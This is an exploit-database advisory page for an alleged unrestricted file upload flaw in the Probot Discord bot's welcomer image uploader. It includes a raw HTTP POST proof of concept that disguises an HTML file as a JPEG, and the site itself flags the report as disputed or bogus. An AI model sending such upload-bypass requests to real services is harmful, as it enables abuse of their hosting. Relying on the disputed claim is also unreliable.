WARNING! Fake news / Disputed / BOGUS

Discord Probot Arbitrary File Upload

2021.02.09
Credit: thelastvvv
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Discord Probot - Unrestricted File Upload # Google Dork: N/A # Date: 2021-02-08 # Exploit Author: ThelastVvV # Vendor Homepage:probot.io # Version:Version 2021 # Tested on: Debian 5.7.10-1parrot2 # CVE:CVE-2021-26918 About: Probot is a discord very customizable multipurpose bot for welcome image, In-depth logs, Social commands, Music, Moderation and many more ... # Description: The attacker can acces to probot dashboard and use image uploader in the welcomer tab , the attacl can upload many file types due the issues of unrestricted file uploads which can be bypassed by changing multipart/form-data POST request with a specially-crafted filename or mime type. # PoC: POST / HTTP/1.1 Host: uploader.probot.io Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------- Content-Length: 333 Origin: https://probot.io DNT: 1 Connection: close Referer: https://probot.io/server/""/welcomer ----------------------------- Content-Disposition: form-data; name="file"; filename="ste.html.jpg" Content-Type: text/html <!DOCTYPE html> <html> <head> <title>bypasss</title> </head> <body> <div>bypass</div> </body> </html> ------------------------------- Note:the link of the file will be generated depend on the content type in this case .html # Impact Unrestricted file uploads can be abused to exploit other vulnerable sections of an application when a file on the same or a trusted server is needed (can again lead to client-side or server-side attacks) #Solution File types should be restricted to only jpg ,png ,jpeg (text/img)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top